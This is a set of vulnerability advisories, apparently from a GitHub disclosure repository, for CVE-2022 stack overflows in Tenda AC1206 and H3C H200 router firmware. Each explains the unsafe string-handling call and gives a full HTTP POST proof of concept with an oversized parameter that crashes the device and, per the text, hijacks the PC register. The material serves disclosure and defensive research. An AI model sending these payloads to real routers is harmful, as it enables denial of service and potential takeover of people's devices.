Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the index parameter in the function formWifiWpsOOB.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the formWifiWpsOOB function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the formWifiWpsOOB function,the index we entered (the value of index) is formatted with the sprintf function, spliced with %s;%s strings, and saved to tmp. It is not secure, as long as the size of the data we enter is larger than the size of tmp, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/WifiWpsOOB HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 336
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    index=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37808: vuln/Tenda/AC1206/15 at main · Darry-lang1/vuln

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the function formSetClientState.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the formSetClientState function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the formSetClientState function,the v3 (the value of limitEn) ,the dev_id (the value of deviceId),the ul_speed (the value of limitSpeedUp) and the dl_speed (the value of limitSpeed) are formatted with the sprintf function, spliced with %d;%s;%s;%s strings, and saved to buff. It is not secure, as long as the size of the data we enter is larger than the size of buff, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/SetClientState HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 336
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    limitEn=1&deviceId=a&limitSpeedUp=a&limitSpeed=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37807: vuln/Tenda/AC1206/10 at main · Darry-lang1/vuln

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the firewallEn parameter in the function formSetFirewallCfg.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the formSetFirewallCfg function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the formSetFirewallCfg function, the firewall_value (the value of firewallEn) we entered is directly copied into the firewall_buf array through the strcpy function.It is not secure, as long as the size of the data we enter is larger than the size of firewall_buf, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/SetFirewallCfg HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 336
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    firewallEn=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37812: vuln/Tenda/AC1206/12 at main · Darry-lang1/vuln

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the startIp parameter in the function formSetPPTPServer.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the formSetPPTPServer function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the formSetPPTPServer function,pptp_server_start_ip(the value of startIp) we entered is formatted using the sscanf function and in the form of %[^.].%[^.].%[^.].%s. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of pptp_server_start_each_ip, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/SetPptpServerCfg HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 12
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    startIp=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&endIp=a
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37811: vuln/Tenda/AC1206/17 at main · Darry-lang1/vuln

Tenda AC1206 V15.03.06.23 was discovered to contain a stack overflow via the page parameter in the function fromDhcpListClient.

**Tenda AC1206 (V15.03.06.23) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2766.html

**Product Information**

Tenda AC1206 V15.03.06.23, the latest version of simulation overview：

**Vulnerability details**

The Tenda AC1206 (V15.03.06.23) was found to have a stack overflow vulnerability in the fromDhcpListClient function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the fromDhcpListClient function,the page we entered (the value of page) is formatted with the sprintf function, spliced with %s strings, and saved to gotopage. It is not secure, as long as the size of the data we enter is larger than the size of gotopage, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/DhcpListClient HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded;
    Content-Length: 336
    Origin: http://192.168.0.1
    DNT: 1
    Connection: close
    Referer: http://192.168.0.1/index.html
    Cookie: ecos_pw=eee:language=cn
    
    page=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

CVE-2022-37806: vuln/Tenda/AC1206/4 at main · Darry-lang1/vuln

H3C H200 H200V100R004 was discovered to contain a stack overflow via the function EditWlanMacList.

**H3C H200\[H200-EI\] (H200V100R004) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202009/1345678\_30005\_0.htm

**Product Information**

H3C H200\[H200-EI\] H200V100R004, the latest version of simulation overview：

**Vulnerability details**

The H3C H200\[H200-EI\] (H200V100R004) was found to have a stack overflow vulnerability in the EditWlanMacList function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the EditWlanMacList function,the param we entered is formatted using the sscanf function and in the form of %u;%[^;];%[^;];. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V5 or V13, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 553
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: JSESSIONID=5c31d502
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=EditWlanMacList&param=1;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell.

CVE-2022-37091: vuln/H3C/H200/10 at main · Darry-lang1/vuln

H3C H200 H200V100R004 was discovered to contain a stack overflow via the function SetAPWifiorLedInfoById.

**H3C H200\[H200-EI\] (H200V100R004) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202009/1345678\_30005\_0.htm

**Product Information**

H3C H200\[H200-EI\] H200V100R004, the latest version of simulation overview：

**Vulnerability details**

The H3C H200\[H200-EI\] (H200V100R004) was found to have a stack overflow vulnerability in the SetAPWifiorLedInfoById function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the SetAPWifiorLedInfoById function,V8(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;]. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V12, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 553
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: JSESSIONID=5c31d502
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=SetAPWifiorLedInfoById&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell.

CVE-2022-37092: vuln/H3C/H200/5 at main · Darry-lang1/vuln

H3C H200 H200V100R004 was discovered to contain a stack overflow via the function SetMobileAPInfoById.

**H3C H200\[H200-EI\] (H200V100R004) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202009/1345678\_30005\_0.htm

**Product Information**

H3C H200\[H200-EI\] H200V100R004, the latest version of simulation overview：

**Vulnerability details**

The H3C H200\[H200-EI\] (H200V100R004) was found to have a stack overflow vulnerability in the SetMobileAPInfoById function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the SetMobileAPInfoById function,V10(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;]. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V17, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 553
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: JSESSIONID=5c31d502
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=SetMobileAPInfoById&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell.

CVE-2022-37087: vuln/H3C/H200/6 at main · Darry-lang1/vuln

H3C H200 H200V100R004 was discovered to contain a stack overflow via the function SetAP5GWifiById.

**H3C H200\[H200-EI\] (H200V100R004) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202009/1345678\_30005\_0.htm

**Product Information**

H3C H200\[H200-EI\] H200V100R004, the latest version of simulation overview：

**Vulnerability details**

The H3C H200\[H200-EI\] (H200V100R004) was found to have a stack overflow vulnerability in the SetAP5GWifiById function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the SetAP5GWifiById function,V5(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;]. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V8, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 553
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: JSESSIONID=5c31d502
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=SetAP5GWifiById&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell.

CVE-2022-37088: vuln/H3C/H200/4 at main · Darry-lang1/vuln

H3C H200 H200V100R004 was discovered to contain a stack overflow via the function Asp_SetTimingtimeWifiAndLed.

**H3C H200\[H200-EI\] (H200V100R004) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202009/1345678\_30005\_0.htm

**Product Information**

H3C H200\[H200-EI\] H200V100R004, the latest version of simulation overview：

**Vulnerability details**

The H3C H200\[H200-EI\] (H200V100R004) was found to have a stack overflow vulnerability in the Asp\_SetTimingtimeWifiAndLed function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the Asp_SetTimingtimeWifiAndLed function,V11(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;];. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V12, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
